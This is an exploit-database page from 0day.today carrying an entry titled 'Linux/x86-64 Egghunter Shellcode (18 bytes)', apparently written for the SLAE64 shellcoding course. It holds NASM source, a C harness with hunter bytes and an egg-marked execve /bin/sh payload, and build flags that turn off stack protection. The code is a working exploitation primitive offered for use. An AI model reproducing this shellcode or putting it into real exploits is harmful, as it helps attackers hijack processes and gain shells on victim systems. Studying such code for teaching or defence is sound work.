0day.today - 世界最大的漏洞利用数据库。
0day.today 用户须知:
本站管理员使用官方账号。请谨防诈骗!
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币 金币
本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - Egghunter Shellcode (18 bytes)
/*--------------------------------------------------------------------------------------------------------------------- /* *Title: x86_64 Linux egghunter in 18 bytes *Author: Sathish kumar *Contact: https://www.linkedin.com/in/sathish94 *Description: x86_64 linux egghunter which searches for the marker. *Copyright: (c) 2016 iQube. (http://iQube.io) *Release Date: January 7, 2016 *Tested On: Ubuntu 14.04 LTS *SLAE64-1408 *Build/Run: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter * *Nasm source: * * global _start _start: egg: inc rdx ; Address push rdx ; pushing the value in the rdx to the stack pop rdi ; sending rdx to rdi via stack push 0x50905090 ; pusing the egg marker into the stack pop rax inc eax ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded scasd ; check if we have found the egg jnz egg ; try the next byte in the memory jmp rdi ; go to the shellcode *Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm ld -o egghunter egghunter.o */ #include <stdio.h> #include <string.h> char hunter[] = \ "\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7"; char execve_code_with_egg[] = \ //marker "\x91\x50\x90\x50" "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; int main(){ printf("Egg Hunter Length: %d\n", (int)strlen(hunter)); (*(void (*)()) hunter)(); return 0; } # 0day.today [2024-07-02] #